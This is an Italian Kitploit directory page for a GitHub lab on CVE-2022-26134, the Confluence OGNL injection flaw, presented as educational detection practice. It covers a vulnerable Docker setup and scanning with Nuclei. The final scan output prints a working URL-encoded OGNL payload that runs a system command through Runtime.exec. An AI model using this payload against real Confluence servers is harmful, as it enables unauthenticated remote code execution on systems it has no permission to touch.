Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-26134-LAB — Rilevamento di CVE-2022-26134 utilizzando Nuclei | Kitploit
Strumenti/GitHubGitHub/skhalsa-sigsci/cve-2022-26134-lab
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubskhalsa-sigsci/cve-2022-26134-lab

CVE-2022-26134-LAB

Rilevamento di CVE-2022-26134 utilizzando Nuclei

Vedi Repository
313 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-26134-LAB

Confluence Server e Confluence Data Center includono una significativa vulnerabilità di esecuzione remota di codice non autenticata identificata come CVE-2022-26134, secondo un advisory di sicurezza rilasciato da Atlassian il 2 giugno 2022. La vulnerabilità non era stata corretta quando è stata pubblicata il 2 giugno ed è stata sfruttata attivamente. A partire dal 3 giugno, sono disponibili sia le patch che una soluzione temporanea.

Questo repository ha esclusivamente scopi sperimentali ed educativi.

Dipendenze

  • Docker
  • Nuclei

Ambiente Confluence Vulnerabile

Esecuzione dell'ambiente vulnerabile

root@kitploit:~
docker-compose up

Una volta avviato, puoi accedere al server Confluence utilizzando il seguente indirizzo URL

http://127.0.0.1:8090/

Configurazione del Server Confluence

  1. La prima volta che visiti il sito verrai guidato attraverso la configurazione.
  2. Non spuntare alcuna casella e seleziona "Next" nella pagina "Get apps".
  3. Nella pagina della chiave di licenza, fai clic sul collegamento che dice "Get an evaluation license".
  4. Verrai reindirizzato a my.atlassian.com. Assicurati che il tipo di licenza selezionato sia Confluence (Data Center). Inserisci qualsiasi nome dell'organizzazione desideri. Assicurati che il pulsante radio per "Your instance is" selezionato sia "up and running". Dopo aver verificato questi dettagli, fai clic sul pulsante "Generate License".
  5. Apparirà una finestra modale di conferma che chiede se vuoi installarlo sul server: 127.0.0.1. Seleziona "Yes".
  6. Selezionando "Yes" la chiave di licenza verrà inserita automaticamente nell'istanza locale di Confluence. Seleziona "Next".
  7. Scegli il tipo di distribuzione "Standalone" e seleziona "Next".
  8. Nella pagina di configurazione del database, i dettagli devono essere compilati come segue:
    • Tipo di database: PostgreSQL
    • Tipo di setup: Simple
    • Hostname: db
    • Porta: 5432
    • Nome del database: confluence
    • Nome utente: confluence
    • Password: 123456789
  9. Dopo aver compilato questi campi, premi il pulsante "Test connection". Dovresti ricevere il messaggio "Success! Database connected successfully". Quindi fai clic su "Next".
  10. Inizierà a configurare il database. Potrebbe volerci un po' di tempo. Abbi pazienza.
  11. Una volta completata la configurazione del database, ti troverai nella pagina "Load Content". Seleziona il pulsante "Example Site".
  12. Successivamente, nella pagina "Configure User Management", seleziona "Manage users and groups with Confluence".
  13. Successivamente, nella pagina "Configure System Administrator Account", crea un account e seleziona "Next".
  14. Una volta completato, vedrai che la configurazione è stata completata con successo. Premi "Start".
  15. Ti chiederà di "Create a space to store your work". Inserisci un qualsiasi nome per lo spazio che preferisci.
  16. Salta il tutorial.
  17. Ora hai completato la configurazione di valutazione di Confluence Server.

Rilevare CVE-2022-26134

La vulnerabilità è una vulnerabilità di iniezione OGNL che colpisce il server HTTP. Il payload OGNL viene inserito nell'URI di una richiesta HTTP. Sembra funzionare con qualsiasi tipo di metodo HTTP, sia valido (GET, POST, PUT, ecc.) sia non valido (ad es. "BALH").

https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

Usare Nuclei

Esegui il seguente comando Nuclei:

root@kitploit:~
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml

Output della scansione

root@kitploit:~
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
Scarica lo strumento